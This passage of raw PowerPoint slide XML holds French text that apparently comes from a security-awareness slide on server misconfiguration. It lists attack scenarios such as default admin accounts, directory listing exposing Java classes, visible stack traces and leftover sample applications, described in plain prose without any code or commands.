              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d’attaque</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scénario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> #1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:  La console </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d’administration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>serveur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d’application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>est</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>automatiquement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>installée</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> et non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>désactivée</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>comptes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> par </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>défaut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ne </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sont</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>modifiés</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L’attaquant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>découvre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> la console , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>utilise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>compte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> par </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>défaut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>prend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>contrôle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scénario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> #2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>listage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>répertoires</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>est</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>activé</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L’attaquant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>découvre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>peut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lister</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>répertoires</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trouver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fichiers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L’attaquant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trouve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>télécharge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> classes java </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>compilées</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>qu’il</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>décompile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> . Il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>identifie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>une</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> faille de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>contrôle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d’accès</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scénario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> #3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: La configuration du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>serveur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d’application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>autorise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l’affichage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> d’état de la pile à </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l’utilisateur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attaquants</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>apprécient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> messages </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d’erreurs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scénario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> #4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>serveur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d’application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>est</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>livré</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> avec des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exemples</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d’applications</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>supprimés</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>votre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
